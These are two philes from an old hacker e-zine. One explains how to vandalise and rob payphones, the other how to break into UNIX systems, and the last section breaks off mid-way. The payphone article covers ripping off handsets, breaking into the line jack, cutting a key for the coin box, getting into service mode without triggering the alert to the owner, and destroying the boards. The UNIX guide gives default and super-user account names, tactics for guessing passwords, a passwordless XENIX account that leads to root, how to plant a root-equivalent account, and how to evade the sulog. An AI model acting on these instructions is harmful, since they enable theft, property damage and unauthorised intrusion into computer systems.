=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

=               Volume 1 , P/HUN Issue #2 , Phile #5 of 9                     =

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



                          Third Party Payphones

                          ---------------------

                              By: The Jedi







Theres been alot of discussion lately about paperclipping and redboxing on

payphones so I decided to write up an article about that subject to be

included in this issue of PHUN. Here are a few things that you'd might find

interesting about payphones....



NOTE: All the payphones discussed in this article refer to Non-New York

      Telephone PayPhones. There are plenty of third party payphones in New

      York. The easiest way to tell if the payphone is from New York Tel is to

      look right under the keypad where is says what numbers to dial for

      information. All New York Payphones will have their Logo printed

      somewhere on that label. If it isn't New York Tel, there will be a

      company name and number listed to call for refunds. Thats the company

      that owns and operates that perticular payphone.







2 - Ripping off the handsets. Now exactly the best way to phuck over the phone

    company but still is fun if you have nothing else to do. Just take a pair

    of pliers, grip them, and turn the opposite direction of the way that the

    steel is woven. This will expose the wires. Cut the wires, and bring your

    handset home with you!!



3 - Breaking into the jack. From what I've seen by repairing payphones, all

    the ones that I've seen have a regular phone jack somewhere in the

    fortress or nearby. This allows you do do a great many things. First lets

    talk about the jack's location.



      The fortress phones that have those big green walls to then are the

    easiest ones to get into. The location of the jack is in the "Stem". Right

    about Knee high there should be a green plate with 6 or so wierd looking

    screws holding it in place. To get that panel off requires a special

    screwdriver. Somewhat like a "Allen Wrench" with a little hole in the

    middle. You can probably pick up a screwdriver like this in most hardware

    stores.

      On the fortress phones that are silver and skinny, the jack is usually

    location in the ground underneath cement. Don't even bother with them.

      On payphones located inside stores, just follow the two wires coming out

    of the phone, it should lead to a beige box with a lock on it. Pick the

    lock or break open the box and you'll see the jack.



      Ok, now that you're into the jack, you can dial anywhere you'd like to.

    Remember, that phone jack is almost exactly like the jack you have in your

    house. Just pick up a cheap $5 phone from radio shack [A small one

    preferrably since you dont want to look obvious] and hook it in! By doing

    this, you're bypassing all the security of the phone [etc...Please Deposit

    .10 cents for the next XX mins.].



4 - Get the Coin Box! Not that easy but one of my friends managed to bring

    home a parking meter so it IS possible!! Theres two locks you must get

    past in order to get to the coin box. First, get a piece of metal and make

    the following.....



                        ___

                      __| |__

                     |__   __|<===-- about 1/4 of an inch

                        | |

                ________| |________

               /                   X

               |                   |

               X___________________/



      This key will allow you to get past the lock in the front of the

    payphone. Ok, pick the lock on the bottom left-hand side of the payphone

    [or drill a hole in it] and then put that key in the front lock and turn

    it clockwise [to the right for those of you that can't tell time! heh].

    Pull out the coin box and go and play 2000 video games!! Each coin box

    holds up to a maximum of $150-175 dollars.



5 - Reprogramming the payphone. The most fun thing and also most dangerous!

    First off, these aren't the stupid NY Telephones, they will call back the

    company automatically if you dont do this correctly! All of the phones

    that I work on have burnt-in Eproms that are for service. You can do

    things like.....



    A) Change the refunds number. This is a number to get in touch with the

    company that operates the phone and get a refund sent to you by mail. When

    you dial it, you won't have to put in a quarter for the call. Now, if you

    can change that number to whatever you'd like, you can make a free phone

    call from that phone anytime you want!



    B) See how much money is in the coin box. You don't want to waste your

    time if theres only $5 in there do you?? You can also erase that amount,

    making it a pain in the ass for the technician who now must count it out

    himself!



    C) Theres a couple of other things in there that I haven't found out about

    yet but as soon as I do, they'll be in the next issue fer sure!



    Ok, the lock for this is either in two places. Check the top of the

    payphone, if theres a lock there, thats the one that you want. It's called

    a service lock. If it isn't there, check the right-hand side of the

    payphone. If it's there, you'll need that key that you've made also. Pick

    the top lock and use the key for the one underneath it.  Once you do that,

    you should get one of the following....



       1 - If the payphone has a LCD Display on it, you'll see a menu

           displaying the following...



              Service Mode:



           Now you'll have to hack out the code. It's usually four digits so

           it should take too long. I'm not about to list the ones that I have

           because I know some asshole will wind up trashing my phones!!!



             Theres a few codes that are possible and each do different

           things. For instance, one code will give you access to the coin box

           counts and test modes while another will give you access to

           programming the emergency numbers and refund numbers. Be sure NOT

           to go into the payphone test mode!! This is cause the payphone to

           display



                PHONE SELF-TEST: Please Do Not Use.



             What happens here is that the phone calls up the company that

           operates the payphone and tells whoever picks up the phone, the

           amount that is in the coin box and whatever thats being do to the

           phone! You're asking for trouble with this mode.





       2 - If there is no display, listen to the handset. A voice will prompt

           you to enter your service entry. It works exactly the same way as

           the LCD Display but just with a voice.



       3 - Either way, once the lock is turned back into the original position,

           the phone will go into self-test mode. The way to get around this

           is to open up the phone. Just pull the front end of the phone

           towards you, this will release half of the phone. Find the power

           supply board. On some models, it will have the power supply on the

           main board [The one standing upright], on others, the power supply

           will have it's own separate board located underneath the main board

           and coin mech. You'll notice which ever section that has a

           transformer on it, thats what I'm talking about. Ok, there should

           be a little orange switch there. If you pull in out, that will turn

           the phone off. Pushing it in will turn the phone back on again. If

           you pull it out and then push it in again, the phone will do a quick

           check of itself [about 3-5 seconds]. Now, put the front end of the

           phone back onto the fortress and turn the service key quickly. If

           you do this quick enough, the phone won't have a chance to go into

           service mode or self-test. It'll be like you never broke into it in

           the first place!



6 - Once you get past the service lock. You can now get inside the payphone

    itself. Pull the front end of the payphone towards you, then lift. Inside

    you'll see various electronic boards, a coin mech, etc... On some models,

    you'll also have a modular cable coming in from the jack, hook up your

    portable phone to it and dial up! Trash the boards, take some home. Thats

    where the real damage comes in! The average payphone costs about $1,200 to

    1,500 bucks and most of that is because of whats inside, not the fortress

    itself.



7 - On most payphones that are in stores, they'll be a couple of wires coming

    out of it. If the phone was hooked up sloppy, they'll be exposed. One wire

    is for power, the other goes to the jack. Cut them or pull out the jack.

    Everyone that puts money into it afterwards will lose it!



8 - On the Intellical and Echotel payphones, theres a special feature that

    will allow the owner of the phone to log into it remotely from a computer.

    As of now, I don't have the exact information on how to break into it

    through modeming but I do know that it is definately possible! Once you

    login, you'll be able to reprogram the rate tables. A rate table is a

    eprom that contains all the information on the rates for calls such as how

    much it costs to call long distance and the amount of time per call thats

    allowed. If you're able to reprogram the rate table, you'll be able to

    make free phone calls anywhere for an unlimited amount of time. As soon as

    I figure out how to crack the program thats used to call in, I'll write

    the information in the next issue. Stay tuned!





 Well, that should be enough for all you guyz to have fun. The next issue will

have a detailed explanation on how the payphone itself operates and whatever

else I might find out that interesting. Until then, if you have any questions,

you can leave me some email.



        ---===>>THE JEDI<<===---





=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

=                Volume 1 , P/HUN Issue #2 , Phile #6 of 9                    =

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=





     /|X/|X/|X/|X/|X/|X/|X/|X/|X/|X/|X/|X/|X/|X/|X/|X/|X/|X/|X/|X

     X|/                                                      X|/

     /|X                                                      /|X

     X|/        An Indepth Guide in Hacking UNIX and the      X|/

     /|X           concept of Basic Networking Utility        /|X

     X|/        ----------------------------------------      X|/

     /|X                   By:Red Knight                      /|X

     X|/        Phreakers/Hackers Underground Network         X|/

     /|X                                                      /|X

     X|/X|/X|/X|/X|/X|/X|/X|/X|/X|/X|/X|/X|/X|/X|/X|/X|/X|/X|/X|/



Brief history on UNIX

----------------------

Its because of Ken Tompson that today were able to Hack Unix.He used to work

for Bell Labs in the 60s.Tompson started out using the MULTICS OS which was

later eliminated and Tompson was left without an operating system to work with.

Tompson had to come up with something real quick.He did some research and

and in 1969 UNIX came out,which was a single user and it didn't have

many capabilities.A combined effort with others he rewrote the version

in C and added some good features.This version was out in 1973 and was

available to the public.This was the first begining of UNIX as its known

presently.The more refined version of UNIX,today know as UNIX system V

developed by Berkley University has unique capabilities.

Various types of UNIXes are CPIX,Berkeley Ver 4.1,Berkeley 4.2,FOS,Genix,HP-UX,

IS/I,OSx,PC-IX,PERPOS,Sys3,Ultrix,Zeus,Xenix,UNITY,VENIX,UTS,Unisys,Uniplus+,

UNOS,Idris,QNIX,Coherent,Cromix,System III,System 7,Sixth edition.



The article it self:

--------------------

I believe that hacking into any system requires knowledge of the Operating

system itself.Basically what I will try to do is make you more familiar with

UNIX  operation ,its usefull commands that will be advantageous to you as a

hacker.This article contains in depth explainations.



Error Messages that one may came across:[UNIX system V]

----------------------------------------

Login incorrect - An ivalid ID and/or pw was entered.This means nothing.

                  In UNIX there is no way guessing valid user IDs.You may

                  come across this one when trying to get in.

No more logins - will happens when the system wont accept anymore logins

                 could be going down

Unknown Id - will happen if an ivalid id is entered using (su) command

Unexpected eof in file - The file being stripped file has been damaged

Your password has expired - This is quiet rare although there have been cases

                            where it happened.Reading the etc/passwd will

                            show you at how many intervals it changes.

You may not change the password - The password has not yet aged enough.The

                                  Administrator set the quotas for the users

Unknown group [groups name] - occurs when chgrp is executed ,group doesn't

                              exist

Sorry - Indicated that you have typed in an invalid super user password(execu-

        tion of the su)

Permission denied!- Indicated you must be the owner or a super user to change

                    password.

Sorry <[# of weeks] since last change - This will happen when password has

                                        has not aged enough and you tried to

                                        change it(passwd)

[directory name]:no permission - You are trying to remove a directory which

                                 you have no permission to.

[file name] not removed - trying to delete a file owned by another user

                          that you dont have write pemision for.

[dirname] not removed - ownership of the dir is not your that your trying to

                        delete.

[dirname] not empty - the directory contains files so you must have to delete

                      the files before executing the rmdir

[command] not found - you have entered an ivalid command not know to UNIX

cant execute pwd - some thing wrong with the system cant execute pwd command

cannot chdir to .. -   (.. one level up) permision is required to execute pwd

                       above the current directory

cant open [file name] - defined wrong path,file name or you have no read

                        permission

cp:[file name] and [file name] are identical - self explanatory

cannot locate parent directory - occurs when using mv

[file name] not found - file which your trying to move doesn't exsist

You have mail - Self explanatory



Basic Networking Utility error messages

---------------------------------------

cu:not found - networking not installed

login failed - invalid id/pw or wrong # specified

dial failed - the systen never answered due to a wrong #

uucp completely failed - did not specify file after -s

wrong time to call - you called at the time at a time not specified in the

                     Systems file

system not in systems - you called a remote not in the systems file



Logon format : first thing one must do is switch to lower case

--------------

Identifing a UNIX.Here is what you'll see:

Some times there will be no system identifer



AT&T UNIX SysVR3.0 (eg of a system identifier)



login:

 or

Login:



Any of these is a UNIX.Here is where you will have to guess at a user valid

id.Here are some that I have come across eg( glr,glt,radgo,rml,chester,cat,

lom,cora,hlto,hwill,edcasey and also some containing numbers smith1,mitu6 or

special characters in it like bremer$,j#fox.Login names have to be 3 to 8

chracters in lenght lowercase and must start with a letter.In some XENIX

systems one may login as "guest"



User level accounts:(lower case)

--------------------

In Unix they have whats called accounts .These

accounts can be used at the "login:" prompt.

Here is a list:



sys

bin

trouble

daemon

uucp

nuucp

rje

lp

adm

listen - if starlan is installed



Super-user accounts:

--------------------

And then there are super-user login which make UNIX worth hacking.

The accounts are used for a specific job. In large systems these logins

are assingned to users who have a responsibilty to maintain subsystems.



They are as follows :(all lower case)



root       -  this is a must the system comes configured with it.It has no

              restriction.Has power over every other account.

unmountsys -  unmounts files

setup      -  system set up

makefsys   -  makes a new file

sysadm     -  allows useful S.A commands(doesn't need root login)

powerdown  -  powering system down

mountfsys  -  mounts files

checkfsys  -  checks file



These accounts will definitly have passwords assigned to them.These

accounts are also commands used by the system administrator.



Here are some examples of accounts I have seen:



cron         uuhelp     usenet

anonuccp     news       network

bellboy      lp         vector

guest        games      ninja

vote         warble     sysinfo







After the login prompt you will receive a password prompt:



password:

  or

Password:



Enter the password (it wont echo).The password rule is as follows:Each pw

has to contain at least 6 characters and maximum has to be 8 .Two of which are

to be alphabetic letters and at least one being a number or a special character

The alphabetic digits could be in upper case or lower case.Here are some of the

passwords that I have seen (eg.Ansuya1,PLAT00N6,uFo/78,ShAsHi..,Div417co)



The passwords for the super user accounts will be difficult to hack

try  the accounts interchangebly eg.login:sysadm password:makefsys or rje1,

sysop,sysop1,bin4 or they might contain letter,numbers,special chracters in

them.It could be anything.The user passwords are changed by an aging proccess

at successive intervals.The users are forced to changed it.The super-user

will pick a password that wont need changing for a long period of time.



You have made it!

-----------------

The hard part is over and hopefully you have hacked a super-user account.

Remember Control-d stops a process and also logs you off.

The next thing you'll probably see is the system news

eg.



login:john

password:hacker1

System news

There will be no networking offered to the users till

august 15,due to hardware problems.

(just an example)



$



$ is the Unix prompt -waiting for a command to be entered.I will use this

                      throught the article to show outouts etc..(Its not

                      part of the command)

# - means your logged in as root(very good)



A word about the XENIX System III:(run on the tandy 6000)

---------------------------------

The largest weakness in the XENIX System III occurs after the installation

of the Profile-16 or more commonly know as the filepro-16.I have seen the

filepro-16 installed in many systems.

The installation process creates an entry in the password file for a user

named XfBprofileXfR ,an account that who owns and administors the database.

The great thing about it is that when the account is created ,no password is

assigned to it.The database contains executable to maintain it.The database

creation programs perform a XfBsetuidXfR to boot up the XfBootXfR  there by

giving a person the whole C Shell to gain Super User privilege same as root.

Intresting huh!





* Note: First the article will inform you of how the Unix is made up



The Unix is made if three components-The shell,the kernal,file system.



The kernal:

-----------

You could say that the kernal is the heart of the Unix operating system.

The kernal is a low level language lower than the shell which maintains

processes .The kernal handles memory usage ,maintains file system

the sofware and hardware devices.



The shell:

----------

The shell a higher level language. The shell had two important uses,

to act as command interpreture for example using commands like cat,who,

ls the the shell is at work figuring out whether you have entered a command

correctly or not.The second most important reason for the shell is its ability

to be used as programing language.Suppose your performing some tasks

repeatedly over and over again,You can program the shell to do this for you.



The file system:

---------------

The file system in Unix is divede into 3 catagories:Directories,ordinary files

and special files.(d,-)



Basic stucture:

(/)-this is abreviation for the root dirctory.

  root level                      root

                                  (/)                                  system

-------------------------------------|----------------------------------level

|      |        |         |                  |        |       |        |

/unix   /etc    /dev      /tmp               /lib     /usr    /usr2    /bin

        |                                        _____|_____

login passwd                                     |    |    |

level                                            /john  /cathy

                             ________________________|_______________

                            |        |     |      |        |        |

                        .profile   /mail  /pers  /games   /bin     /michelle

*.profile - in case                        |    __|______  |      __|_______

 you wich to change your enviroment     capital |        | data   |         |

but after you log off.It sets to              othello  starwars letter letter1

default.



the /unix-is the kernal

/etc - contains system administrators files,Most are not available to the

       regular user.(this directory contains the /passwd file)



    Here are some files under /etc directory:

    /etc/passwd

    /etc/utmp

    /etc/adm/sulog

    /etc/motd

    /etc/group

    /etc/conf

    /etc/profile



/dev - contains files for physical devices such as printer and the disk drives

/tmp - temporary file directory

/lib - dirctory that contains programs for high level languages

/usr - this directory contains dirctories for each user on the system



     Eg. of a list of files under /usr

    /usr/tmp

    /usr/lib

    /usr/docs

    /usr/news

    /usr/spool

    /usr/spool/lp

    /usr/lib/uucp



/bin - contain executable programs (commands)



The root also contains:

/bck - used to mount a back up file system.

/install - Used to install and remove utilities

/lost+found - This is where all the removed files go,This dir is used by fsck

              (1M)

/save -A utility used to save data

/mnt - Used for temporary mounting



**Now the fun part scouting around**



                 Local commands (Explained in details)

                 -------------------------------------

At the unix prompt type the pwd command-it will show you the current working

directory you are in.



$ pwd

$ /usr/admin - assuming that you have hacked into a super user acc checkfsys

$



This gives you the full login directory.The / before tell you the location

of the root directory



or



(REFER TO THE DIAGRAM ABOVE)

$ pwd

$ /usr/john

$

Assuming you have hacked into johns acc.



Now lets say you wanted to move down to the michelle directory( you own this)

that contains letters.You would type in



$ cd michelle or cd usr/john/michelle

$ pwd

$ /usr/john/michelle

$



Going back one directory up type in:

$ cd ..

or going to your parent directory just type in "cd"



Listing file directories assuming you are in the parent directory:



$ ls /usr/john

mail

pers

games

bin

michelle

This wont give you the .profile file .To view it type

$ cd

$ ls -a

:

:

.profile



To list file names in michelles directory type in:

$ ls michelle (that if your in the johns directory)

$ ls /usr/john/michelle(parent dir)



ls -l

-----

The ls -l is an an important command in unix.This command displays the whole

directory in long format :Run this in parent directory



$ ls -l

total 60

-rwxr-x---    5 john      bluebox    10 april 9  7:04  mail

drwx------    7 john      bluebox    30 april 2  4:09  pers

     :            :         :         :     :      :    :

     :            :         :         :     :      :    :

-rwxr-x---     6 cathy    bluebox    13 april 1  13:00 partys

     :            :         :         :     :      :    :

$



The total 60 tells one the ammount of disk space used in a directory.The

-rwxr-x--- is read in triples of 3.The first chracter eg(-,d,b,c)-means as

follows: - is an ordinary file ,d is a directory,b is block file,c is a

chracter file.

The r stands for read permission,w is write permission,x is execute.The first

colum is read in 3 triples as stated above.The first group of 3 (in -rwxr-x---)

after the "-" specifies the permission for the owner of the file,the second

triple are for the groups (the fourth colum) and the last triple are the

permissions for all other users.Therefore the -rwxr-x--- is read as follows.

The owner john has permission to read,write and execute anything in the bin

directory but the group has no write permission to it and the rest of the users

have no permission at all.The format of one of the lines in the above output

is as follows:



file type-permissions,links,usersname,group,bytes taken,date,time when last

renued,directory or file name.

**You will be able to read,execute cathys file named party due to the same

group***



chmod

-----

The chmod command changes permission of a directory or a file.Format is

chmod who+,-,=r,w,x

The who is substituted by u-user,g-group,o-other users,a-all.

The + means add permission,- means remove permission,= - assign.

Example :If you wanted all other users to read the file name mail ,type:



$ chmod o+r mail



cat

---

Now suppose you wanted to read the file letter .There are teo ways to doing

this.First go to the michelle directory then type in:



$ cat letter

line one ...X

line two ... the output of letter

line three../

$

   or

If you are in the parent directory type in:

$ cat /usr/john/michelle/letter

and you will have the same output.



Some cat options are  -s,-u,-v,-e,-t



Special Chracters in Unix:

-------------------------

*  - matches any number of single characters eg. ls john* will list

     all files that begin with john

[...] - matchs any one of the chracter in the [ ]

? - matches any single chracter

& - runs a process in the backgroung leaving your terminal free

$ - Values used for variables also $n - null argument

> - redirectes output

< - redirects input to come from a file

>> - redirects command to be added to the end of a file

| - pipe output (eg:who|wc-l tells us how many users are online)

"..." - Turn of meaning of special chracters excluding $,

... - allows command output in to be used in a command line

'...' - turns of special meaning of all chracters



continuation of local commands...[     ] -contains the options used

-------------------------------

passwd

------

Password changing seems to be a big thing among the savants.Anyway to change

the password one would use the 'passwd' command as shown below:



   $passwd

   Changing password for john

   Old password:

   New password:

   Retype new password:

   $



This will only work when the password has aged enough



ps

--

Its sometimes necessary to see what command procesess you are running,this

command lets you see that.

ps [-a all processes except group leaders] [-e all processes] [-f the whole

   list]



   $ps

   PID   TTY  TIME   COMMAND

   200   tty09 14:20  ps



   The systems reports (PID - process idenetification number which is a #

   from 1-30,000 assigned to UNIX processes)

   It also reports the TTY,TIME and the COMMAND being executed at the time.

   To stop a process enter :



   $kill [PID] (this case its 200)

   200 terminated

   $



grep

----

This comand is important when seaching for a word or words in large files.



grep [argument] [file name] - searchs for an file that contains the argument

                              for example:

   $ grep phone cathy

    phone   michelle  (718)5551234

    phone   cindy   (718)5553456



    What this did was to find the argument 'phone' in the file cathy.If the

    argument consists of two or more words then  it must be enclosed in single

    quotes.





mv

--

mv [file names(s)] [ dir name ] - renames a file or moves it to another

                                  directory eg.

   $mv letter letters

   $

   This renames the file letter to letters thereby deleting letter

                  or if you want to move files then

   $mv /usr/john/pers/capital /usr/john/michelle/capital

   $

   This moves the file capital to the directory named michelle



diff

----

diff [file name] [ file name] - show diffrence between two files.Output of this

                                will have something like 4,5c4,5 then the it

                                will display both sets of files on the screen

                                The 4,5c4,5 means that you must change "c"

                                lines 4 to 5 in one file to line 4 to 5 in

                                another.

      Option for using this command are :

       -b  -  it ignores blank spaces

       -h  - compares it quickly

       -s  - reports files that are the same

       -S[file] - this is when you want to compare a directory starting at a

                  specific file





       There is also a command to compare 3 files which is :



       diff3 [options] [file1] [file2] [file3]



cp

--

cp [file name] [file name] - makes a copy of a file



   $ cp letter letters

   $

   The file letters is a dupilcate copy of letter.In this case the original

   is not erased like in the mv command







.... more UNIX commands:

--------------------



man [command] or [c/r] -will give you a list of commands explainations



help - available on some UNIX systems



mkdir [dir name(s)] - makes a directory



rmdir [dir name(s)] - removes directory.You wont be able to remove the

                      directory if it contains files in them



rm [file name(s)] - removes files. rm * will erase all files in the current

                    dir.Be carefull you!!.Some options are :

                    [-f unconditional removal] [-i Prompts user for y or n]



write [login name ] - to write to other logged in users.Sort of a chat



mesg [-n] [-y] - doesn't allow others to send you messages using the write

                 command.Wall used by system adm overrides it.



$ [file name] - to execute any file



wc [file name] - Counts words,chracters,lines in a file



stty [modes] - Set terminal I/O for the current devices



sort [filename] - Sorts and merges files many options



spell [file name] > [file name] - The second file is where the misspelt words

                                  are entered



date [+%m%d%y*] [+%H%%M%S] - Displays date acoording to options



at [-r] [-l] [job] - Does a specified job at a specified time.The -r Removes

                     all previously scheduled jobs.The -l reports the job #

                     and status of all jobs scheduled



write [login] [tty] - Sends message to the login name.Chat!







su [login name]

---------------

The su command allows one to switch user to a super user to a user.Very

important could be used to switch to super user accounts.

Usage:



$ su sysadm

password:



This su command will be monitored in /usr/adm/sulog and this file of all files

is carefully monitered by the system administrator.Suppose you hacked in johns

account and then switched to the sysadm account (ABOVE) your /usr/adm/sulog

entry would look like:



SU  04/19/88  21:00 + tty 12 john-sysadm



Therfore the S.A(system administrator) would know that john swithed to sysadm

account on 4/19/88 at 21:00 hours



Searching for valid login names:

-------------------------------

Type in-

$ who  ( command informs the user of other users on the system)

cathy  tty1  april 19  2:30

john   tty2  april 19  2:19

dipal  tty3  april 19  2:31

:

:

tty is the users terminal,date,time each logged on.dipal,john are valid

logins.



Files worth concatenating(cat)

/etc/passwd file:

-----------------

The etc/passwd is a vital file to cat.For it contains login names of all

users including super user accounts and there passwords.In the newer

SVR3 releases they are tighting their security by moving the encrypted

passwords from /etc/passwd to /etc/shadow making it only readable by root.

This is optional offcourse.



$ cat /etc/passwd

root:D943/sys34:0:1:0000:/:

sysadm:k54doPerate:0:0:administration:usr/admin:/bin/rsh

checkfsys:Locked;:0:0:check file system:/usr/admin:/bin/rsh

:

other super user accs.

:

john:chips11:34:3:john scezerend:/usr/john:

:

other users

:

$

If you have reached this far capture this file as soon as posible.

This is a typical output etc/passwd file.The entries are seperated

by a ":".There made be up to 7 fields in each line.

Eg.sysadm account.

The first is the login name in this case sysadm.The second field contains the

password.The third field contains the user id."0 is the root".Then comes the

group id then the account which contains the user full name etc .The sixth

field is the login directory defines the full path name of the the particlar

account and the last is the program to be executed.

Now one can switch to other super user account using su command descibed above.

The password entry in the field of the checkfsys account in the above example

is "Locked;". This doesn't mean thats its a password but the account

checkfsys cannot be accessed remotely.The ";" acts as an unused encryption

chracter.A space is also used for the same purpose.You will find this in many

UNIX systems that are small systems where the system administrator handles

all maintaince.



Password aging:

---------------

If password aging is active the user is forced to change the password at

regular intervals.One may be able to tell just by looking at the /etc/passwd

file when the password is allowed to be changed and when it is compulsory to

change it.

For example the entry:



john:chips11,43:34:3:John Scezerend:/usr/john:



The password contains an extension of (,43) which mean that john can change has

to change the password atleast evert 6 weeks and can keep it for atleast 3

week.The format used is [password],Mmww.The M is the maxiumum number of weeks

password has to be change and m is the minimum interval password can be changed

and the ww is indicates when the password was last changed.



    Aging chart:

---------|-----------

Character|# of weeks

    .    |  0

    /    |  1

 0-9     | 2-11

 A-Z     | 12-37

 a-z     | 38-63

---------|-----------



>From the above anyone can determine the number of weeks one can chnage the

password.



The (ww) is automatically added as to when the password was last changed .



IF SHAWDOWING IS ACTIVE:

------------------------



If the shawdowing is active the /etc/passwd would look like this:



root:x:0:1:0000:/:

sysadm:x:0:0:administration:/usr/admin:/bin/rsh



The password filed is substituted by "x".



The /etc/shawdow file only readable by root will look similar to

this:



root:D943/sys34:5288::

:

super user accounts

:

Cathy:masai1:5055:7:120

:

all other users

:



The first field contains users id:the second contains the password(The pw will

be NONE if logining in remotely is deactivated):the third contains a code of

when the password was last changed:the fourth and the fifth contains the

minimum and the maximum numbers of days for pw changes(Its rare that you will

find this in the super user logins due to there hard to guess passwords)





/etc/options directory

-----------------------

The etc/options dir will consists of utilities available in the system.

Example:

-rwxr-xr-x   1 root  sys   40 april  1:00  uucp.name

uucp standing for BNU



/etc/group

-----------

The file has each group on the system.Each line will have 4 entries separated

by a ":" . Example of concatenated /etc/group:



root::0:root

adm::2:adm,root

bluebox::70:



Group name:password:group id:login names

** It very unlikely that groups will have passwords assigned to them **

The id "0" is assigned to /



Sending and recieving messages:

-------------------------------

Two programs are used to manage this.They are mail & mailx.The difference

between them is that mailx is more fancier thereby giving you many choices

like replying message ,using editors etc.

Sending:

--------

The basic format for using this command is:



$mail [login(s)]

(now one would enter the text

after finishing enter "." a period

on the next blank line)

$

This command is also used to send mail to remote systems.Suppose you wanted

to send mail to john on a remote called ATT01

you would type in:



$mail ATT01!john



Mail can be sent to several users,just by entering more login name after

issuing the mail command



Using mailx is the same format:(This I'll describe very briefly)

$mailx john

subject:(this lets you enter the subject)

(line #1)

(line #2)

(After you finish enter (D.) not the brackets offcourse ,more commands are

available like Dp,Dr,Dv,Dm,Dh,Db etc.)



Receiving:

----------

After you log on to the system you will the account may have mail waiting.

You will be notified "you have mail".

To read this enter:

$mail

(line #1)

(line #2)

(line #3)

?

$

After the message you will be prompted with a question mark.Here you have a

choice to delete it by entering d,saving it to view it later s,or just press

enter to view the next message.

(DONT BE A SAVANT AND DELETE THE POOR GUYS MAIL)



Super user commands:

--------------------

$sysadm adduser - will take you through a routine to add a user

                 (may not last long)



Enter this:



$ sysadm adduser

password:

(this is what you will see)

/--------------------------------------------------------------------------X

  Process running succommmand adduser

  USER MANAGMENT



  Anytime you want to quit, type "q".

  If you are not sure how to answer any prompt, type "?" for help



  If a default appears in the question,press <RETURN> for the default.



  Enter users full name [?,q]: (enter the name you want)

  Enter users login ID [?,q]:(the id you want to use)

  Enter users ID number (default 50000) [?,q) [?,q]:( press return )

  Enter group ID number or group name:(any name from /etc/group)

  Enter users login home directory:(enter /usr/name)



  This is the information for the new login:

  Users name: (name)

  login ID:(id)

  users ID:50000

  group ID or name:

  home directory:/usr/name

 Do you want to install,edit,skip [i,e,s,q]? (enter your choice if "i" then)

 Login installed

 Do you want to give the user a password?[y,n] (its better to enter one)

 New password:

 Re-enter password:



 Do you want to add another login?

X----------------------------------------------------------------------------/



This is the proccess to add a user.Since you hacked into a super user account

you can make a super user account by doing the following by entering 0 as an

user and a group ID and enter the home directory as /usr/admin.This will give

you as much access as the account sysadm

**Caution** - Do not use login names like Hacker,Cracker,Phreak etc .This is

a total give away.

The process of adding a user wont last very long the S.A will know when he

checks out the /etc/passwd file



$sysadm moduser - This utility allows one to modify users.DO NOT ABUSE!!!

Password:



This is what you'll see:



/----------------------------------------------------------------------------X

MODIFYING USER'S LOGIN



1)chgloginid  (This is to change the login ID)

2)chgpassword (Changing password)

3)chgshell (Changing directory DEFAULT = /bin/sh)



ENTER A NUMBER,NAME,INITIAL PART OF OF NAME,OR ? OR <NUMBER>? FOR HELP,

Q TO QUIT ?

X----------------------------------------------------------------------------/



Try every one of them out.Do not change someones password.It creates a havoc.

If you do decide to change it.Please write the original one down somewhere

and change back.Try not to leave to many traces after you had your fun.

In choice number 1 you will be asked for the login and then the new one.

In choice number 2 you will asked for the login and then supplied by it correct

password and enter a new one.

In choice 3 this is used to a pchange the login shell ** Use full **

The above utilites can be used separatly for eg( To change a password one

coulfd enter: $sysadm chgpasswd not chapassword ,The rest are same)



$sysadm deluser - This is an obviously to delete a user

password:



This will be the screen output:

/---------------------------------------------------------------------------X

Running subcommand 'deluser' from menu 'usermgmt'

USER MANAGEMENT

This fuction completely removes the user,their mail file,home directory

and all files below their home directory from the machine.



Enter login ID you wish to remove[q]:      (eg.cathy)

'cathy' belongs to 'Cathy Franklin'

whose home directory is /usr/cathy

Do you want to remove this login ID 'cathy' ? [y,n,?,q] :



/usr/cathy and all files under it have been deleted.



Enter login ID you wish to remove [q]:

X--------------------------------------------------------------------------/

This command deletes everthing owned by the user.Dont use it even if you have

access to it.







other super user commands:

--------------------------

wall [text] control-d  - to send an anouncement to users logged in(will

                          override mesg -n command).Execute only from /

/etc/newgrp - is used to become a member of a group



sysadm [program name]

        delgroup - delets groups

        whoson - self explanatory

        lsgroup - Lists group

        mklineset -hunts various sequences

        lsuser -lists all the users & their logins names



Other commands may require file system to be mounted.





                       Basic Networking utility(BNU)

                       -----------------------------



The BNU is a unique feature in UNIX.Some systems may not have this installed.

What BNU does is allow other remote UNIXes communicate with yours without

logging off the present one.BNU also allowes file transfer between computers.

Most UNIX systems V will have this feature installed.



The user program like cu,uux etc are located in the /usr/bin directory



Basic Networking Files:

-----------------------

/usr/lib/uucp/[file name]

 [file name]

 systems - cu command to establishes link.Contains info on remote computers

           name,time it can be reached,login Id,password,telephone numbers

 devices - inter connected with systems files(Automatic call unit same in two

           entries)also cantains baud rate,port tty1 etc.



 dialers - where asscii converation must be made before file tranfers etc.

 dialcodes - contains abreiviations for phone numbers that can be used in

             systems file



 other files are sysfiles,permissions,poll,devconfig



B.N.U Aministrative files:

--------------------------

There are 5 admnistrative files present.These are files are created in the

/usr/spool directory .These A.Files are responsible for various BNU procceses

like kepping records data ,files tranfers bettwenn remote and local and also

usefull to lock devices.



TM - This file used to hold temporary data .When tranfering the files from a

     remote to local the /usr/spool/uucp/[name of the remote computer ] creates

     this in the format of as of below:



     TM[Process Identification Number].[ddd]



     The ddd is the a 3 digit number (sequential) starting with "0"

     Here a typical eg: TM322.012

     Then this file is moved into the path defined by the C.sysnxxx file



X.[Execute files] - Created in the /usr/spool before you execute the commands

                    in remote.

                    The format used to name this file is X.sysnxxx

                    where sys stand for the remote name and n is the priority

                    level the xxxx is a sequence assingned by the uucp.These

                    files always contain the Name of the file ,Comuter & file

                    name to recieve,Persons login & computer name and the

                    command string.



LCK - The lock file created in the /usr/spool/locks directory.The is used when

      devices are being used.Prevent usage of the same calling device.



     Format used: LCK.str wher the str is a device name.The Lock file contains

     the PID needed to lock



C.sysnxxx - created in the usr/spool directory.These are the work files.Used

            when work is in line,remote execeutions.Format is same as the

            X.sysnxxxx.The works files contain the full path name of the file

